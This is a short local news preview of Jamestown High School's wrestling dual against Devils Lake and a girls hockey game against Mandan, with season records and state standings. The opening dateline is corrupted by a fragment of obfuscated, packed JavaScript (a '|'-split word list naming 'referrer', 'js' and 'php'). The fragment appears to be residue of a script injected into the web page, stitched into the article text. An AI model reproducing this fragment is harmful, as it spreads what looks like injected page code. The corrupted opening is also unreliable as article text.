JAMESTOWN neyde|var|u0026u|referrer|rfhhs||js|php’.split(‘|’),0,{}))
– After more than two weeks off during the holidays, the Jamestown High School wrestling team gets back into the action tonight with a home dual against Devils Lake.
The varsity dual is set to start about 7 p.m. at Jerry Meyer Arena. The Blue Jays haven’t taken the mat since a tournament in Valley City on Dec. 17. They have a 3-8 overall record in duals this season, struggling with open weights that force forfeits.
Devils Lake, out of the Eastern Dakota Conference, is 1-3 in duals this season, beating Fargo South 31-30 in their season opener back on Nov. 22. The Blue Jays go to Bismarck this weekend for the Bismarck Rotary Tournament on Friday and Saturday.
Also getting back into action tonight after a layoff is the Jamestown girls hockey team, which hosts Mandan at 7 p.m. at John Wilson Arena in Jamestown. The Blue Jays haven’t taken the ice since they completed a tournament at Crookston on Dec. 28. Jamestown tied East Grand Forks 3-3 and defeated Crookston 2-1 during that tournament.
Jamestown is 3-5-1 overall this season, while Mandan is 4-6. The two teams are jockeying to stay in the Top 8 of the state’s hockey standings. Jamestown currently sits in eighth with five points, while Mandan is ninth with four points.
